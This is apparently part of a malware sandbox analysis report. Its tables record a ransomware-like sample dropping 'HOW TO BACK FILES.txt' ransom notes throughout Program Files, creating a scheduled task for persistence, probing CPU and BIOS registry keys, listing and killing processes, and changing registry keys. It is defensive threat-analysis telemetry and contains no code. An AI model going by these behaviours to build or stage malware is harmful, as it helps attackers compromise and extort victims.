| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\he-il\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-64_altform-unplated.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.contrast-black_scale-125.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\MediumTile.scale-200_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\management\jmxremote.password.template | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007 | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-100_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-125.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\THMBNAIL.PNG | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-white.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-200.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office15\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-100_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ppd.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-400_contrast-black.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\classlist | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_altform-unplated_contrast-white.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_ReptileEye.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\2.jpg | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELM | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_2019.729.2301.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\1.jpg | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125_contrast-white.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\MilitaryRight.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll.config | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-pl.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireMedTile.scale-200.jpg | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\Desktop\a\random.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Creates scheduled task(s)
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133617333282974790" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000009c6e09240a1da01a96b3ab041b4da01a96b3ab041b4da0114000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 = 4400310000000000c158798410006100340009000400efbec1587884c15879842e000000e8330200000009000000000000000000000000000000b5d4b0006100000010000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = 00000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\NodeSlot = "12" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "11" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1226833921" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Documents" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
